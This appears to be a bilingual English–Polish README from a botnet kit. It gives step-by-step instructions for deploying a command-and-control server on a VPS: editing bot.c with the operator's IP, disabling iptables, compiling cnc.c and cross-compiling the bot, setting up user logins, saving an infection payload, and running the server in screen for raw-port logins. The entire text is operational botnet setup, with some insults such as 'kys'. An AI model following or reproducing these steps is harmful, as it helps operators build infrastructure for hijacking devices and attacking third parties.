
Edit the bot.c file	AND CHANGE THE IP YOU SKANK WANK / zmien ip na swoje 

drag all files to an vps , przeruć wszystkie pliki na vps 

chmod 777 *

sh auto.sh 					 

yum install python-paramiko nano screen gcc perl wget lbzip unzip -y # wklej na vps i odpal

next / potem to

 service httpd restart 
 service iptables stop

next
 
gcc cnc.c -o server -pthread

python compile.py bot.c ur vps ip / ip twojego vpska

nano User_Info.txt         [Username password]  for example X X or kys kys 



ZAPISZ PAYLOAD DO PLIKU PAYLOAD.TXT / SAVE UR PAYLOAD TO PAYLOAD.TXT


screen ./server 839 1 105                      [420 or 105  Will Be The Port For The Net]


NOW PRESS CRTL A+D

LOGIN WITH PUTTY RAW PORT = 420


